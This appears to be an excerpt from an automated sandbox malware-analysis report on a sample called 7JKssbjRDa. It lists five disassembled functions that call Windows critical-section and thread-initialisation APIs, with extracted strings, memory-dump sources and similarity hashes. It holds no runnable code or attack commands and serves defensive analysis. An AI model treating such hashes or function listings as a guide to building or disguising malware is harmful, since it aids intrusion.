Function 004071C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8

__Init_thread_footer.LIBCMT ref: 00407229

Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA

Strings

DCDO, xrefs: 004071D6
^]E*, xrefs: 004071DD

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: DCDO$^]E*
API String ID: 2296764815-2708296792
Opcode ID: 0756c2e69ee73cd6b1975565275e615d9ad55c5d2def375231612cac40b3d99a
Instruction ID: 8efc7060af64cb8acb1af25de2c4b339d239c6825e953d18f5e204f1a235d67b
Opcode Fuzzy Hash: 0756c2e69ee73cd6b1975565275e615d9ad55c5d2def375231612cac40b3d99a
Instruction Fuzzy Hash: 8F016D70F002089BC720EF68E94295DB7B0EB08304F9441BEE919A7396DB3969158BCE

Function 04B47427 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F

__Init_thread_footer.LIBCMT ref: 04B47490

Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA

Strings

DCDO, xrefs: 04B4743D
^]E*, xrefs: 04B47444

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: DCDO$^]E*
API String ID: 4132704954-2708296792
Opcode ID: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
Instruction ID: 6f4b96e39770c75f6dbf9a5ad1d2e765e7569c03ea8a6f485ed5ebe238ee9a96
Opcode Fuzzy Hash: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
Instruction Fuzzy Hash: 2A01ADB0B00208ABCB20EF68E98256DBBB0EB44314F8401BAC91957390CB35B9109F89

Function 04B47317 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F

__Init_thread_footer.LIBCMT ref: 04B47380

Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA

Strings

EDO*, xrefs: 04B47334
DCDO, xrefs: 04B4732D

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: DCDO$EDO*
API String ID: 4132704954-3480089779
Opcode ID: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
Instruction ID: f8e536f69ee61ca72cfba216928ad109341b111eb874ba451fd152c23f1c1cb4
Opcode Fuzzy Hash: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
Instruction Fuzzy Hash: 0F01D6F0B013089FDB10DF64E98159DB7B0EB85304F9041F9CA15573A0CB347981DB89

Function 04CF64B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 04CF6519

Strings

EDO*, xrefs: 04CF64CD
DCDO, xrefs: 04CF64C6

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID: Init_thread_footer
String ID: DCDO$EDO*
API String ID: 1385522511-3480089779
Opcode ID: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
Instruction ID: ca1d45f45f879eefd52c6732b31f4e1b4ccb8f88810e0ba0a058895270f261f9
Opcode Fuzzy Hash: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
Instruction Fuzzy Hash: 2501D6B0B012089FDB60EFA4EC8155CB7B1E705304F904579CB0597350DB387A858B99

Function 04CF65C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 04CF6629

Strings

^]E*, xrefs: 04CF65DD
DCDO, xrefs: 04CF65D6

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID: Init_thread_footer
String ID: DCDO$^]E*
API String ID: 1385522511-2708296792
Opcode ID: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
Instruction ID: f44df31befee56a4becd036a8d8fa0c0979a67861187bd214ef651ff3220b3c4
Opcode Fuzzy Hash: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
Instruction Fuzzy Hash: 5E018170F00208AFDB60FFA8ED4256CBBB1EB04304F94417ADA1997394DF397A159B99